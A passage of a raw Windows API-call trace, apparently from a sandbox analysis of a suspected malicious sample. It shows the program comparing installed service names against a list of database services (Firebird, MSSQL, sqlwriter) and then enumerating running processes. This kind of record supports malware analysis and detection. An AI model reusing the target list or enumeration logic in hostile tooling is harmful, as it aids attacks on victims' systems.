(lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0166.902] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0166.902] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0166.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0166.902] lstrlenW (lpString="Dhcp") returned 4 [0166.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0166.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0166.902] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0166.902] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0166.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0166.902] lstrlenW (lpString="Dnscache") returned 8 [0166.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0166.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0166.902] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0166.902] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0166.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0166.902] lstrlenW (lpString="DPS") returned 3 [0166.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0166.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0166.902] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0166.902] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0166.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0166.902] lstrlenW (lpString="DusmSvc") returned 7 [0166.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0166.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0166.903] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0166.903] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0166.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0166.903] lstrlenW (lpString="EventLog") returned 8 [0166.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0166.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0166.903] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0166.903] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0166.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0166.903] lstrlenW (lpString="EventSystem") returned 11 [0166.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0166.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0166.903] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0166.903] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0166.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0166.903] lstrlenW (lpString="FontCache") returned 9 [0166.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0166.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0166.903] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0166.903] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0166.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0166.903] lstrlenW (lpString="gpsvc") returned 5 [0166.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0166.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0166.904] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0166.904] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0166.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0166.904] lstrlenW (lpString="iphlpsvc") returned 8 [0166.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0166.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0166.904] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0166.904] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0166.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0166.904] lstrlenW (lpString="KeyIso") returned 6 [0166.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0166.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0166.904] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0166.904] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0166.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0166.904] lstrlenW (lpString="LanmanServer") returned 12 [0166.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0166.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0166.904] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0166.904] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0166.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0166.904] lstrlenW (lpString="LanmanWorkstation") returned 17 [0166.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0166.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0167.056] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0167.056] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0167.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0167.056] lstrlenW (lpString="lfsvc") returned 5 [0167.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0167.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0167.056] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0167.056] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0167.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0167.056] lstrlenW (lpString="lmhosts") returned 7 [0167.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0167.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0167.056] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0167.057] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0167.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0167.057] lstrlenW (lpString="LSM") returned 3 [0167.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0167.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0167.057] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0167.057] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0167.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0167.057] lstrlenW (lpString="MpsSvc") returned 6 [0167.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0167.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0167.057] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0167.057] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0167.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0167.057] lstrlenW (lpString="NcbService") returned 10 [0167.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0167.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0167.057] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0167.057] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0167.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0167.057] lstrlenW (lpString="netprofm") returned 8 [0167.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0167.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0167.057] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0167.057] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0167.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0167.058] lstrlenW (lpString="NgcSvc") returned 6 [0167.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0167.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0167.058] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0167.058] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0167.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0167.058] lstrlenW (lpString="NlaSvc") returned 6 [0167.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0167.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0167.058] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0167.058] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0167.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0167.058] lstrlenW (lpString="nsi") returned 3 [0167.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0167.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0167.058] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0167.058] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0167.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0167.058] lstrlenW (lpString="PcaSvc") returned 6 [0167.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0167.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0167.058] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0167.058] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0167.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0167.058] lstrlenW (lpString="PlugPlay") returned 8 [0167.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0167.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0167.059] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0167.059] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0167.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0167.059] lstrlenW (lpString="Power") returned 5 [0167.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0167.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0167.059] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0167.059] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0167.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0167.059] lstrlenW (lpString="ProfSvc") returned 7 [0167.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0167.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0167.059] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0167.059] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0167.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0167.059] lstrlenW (lpString="RpcEptMapper") returned 12 [0167.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0167.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0167.059] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0167.059] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0167.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0167.059] lstrlenW (lpString="RpcSs") returned 5 [0167.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0167.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0167.059] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0167.059] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0167.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0167.060] lstrlenW (lpString="SamSs") returned 5 [0167.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0167.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0167.060] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0167.060] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0167.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0167.060] lstrlenW (lpString="Schedule") returned 8 [0167.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0167.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0167.060] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0167.060] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0167.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0167.060] lstrlenW (lpString="SecurityHealthService") returned 21 [0167.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0167.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0167.060] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0167.060] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0167.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0167.060] lstrlenW (lpString="SENS") returned 4 [0167.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0167.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0167.060] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0167.060] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0167.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0167.060] lstrlenW (lpString="ShellHWDetection") returned 16 [0167.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0167.061] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0167.061] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0167.061] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0167.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0167.061] lstrlenW (lpString="Spooler") returned 7 [0167.061] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0167.061] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0167.061] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0167.061] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0167.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0167.061] lstrlenW (lpString="StateRepository") returned 15 [0167.061] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0167.061] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0167.061] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0167.061] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0167.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0167.061] lstrlenW (lpString="SysMain") returned 7 [0167.061] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0167.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0167.062] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0167.062] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0167.062] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0167.062] lstrlenW (lpString="SystemEventsBroker") returned 18 [0167.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0167.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0167.062] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0167.062] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0167.062] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0167.062] lstrlenW (lpString="Themes") returned 6 [0167.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0167.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0167.062] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0167.062] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0167.062] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0167.062] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0167.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0167.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0167.062] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0167.062] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0167.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4595010 | out: hHeap=0x6a0000) returned 1 [0167.063] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x51c [0167.066] Process32FirstW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.067] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0167.068] lstrlenW (lpString="System") returned 6 [0167.068] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0167.069] lstrlenW (lpString="smss.exe") returned 8 [0167.069] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0167.070] lstrlenW (lpString="csrss.exe") returned 9 [0167.070] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0167.071] lstrlenW (lpString="wininit.exe") returned 11 [0167.071] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0167.072] lstrlenW (lpString="csrss.exe") returned 9 [0167.072] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0167.072] lstrlenW (lpString="winlogon.exe") returned 12 [0167.073] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0167.073] lstrlenW (lpString="services.exe") returned 12 [0167.074] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0167.074] lstrlenW (lpString="lsass.exe") returned 9 [0167.074] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0167.075] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0167.075] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0167.076] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0167.077] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.078] lstrlenW (lpString="svchost.exe") returned 11 [0167.078] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.079] lstrlenW (lpString="svchost.exe") returned 11 [0167.079] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0167.079] lstrlenW (lpString="dwm.exe") returned 7 [0167.080] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.080] lstrlenW (lpString="svchost.exe") returned 11 [0167.080] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.081] lstrlenW (lpString="svchost.exe") returned 11 [0167.081] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.082] lstrlenW (lpString="svchost.exe") returned 11 [0167.082] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.083] lstrlenW (lpString="svchost.exe") returned 11 [0167.083] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.083] lstrlenW (lpString="svchost.exe") returned 11 [0167.084] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.084] lstrlenW (lpString="svchost.exe") returned 11 [0167.084] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.085] lstrlenW (lpString="svchost.exe") returned 11 [0167.085] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.086] lstrlenW (lpString="svchost.exe") returned 11 [0167.086] Process32NextW (in: hSnapshot=0x51c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, 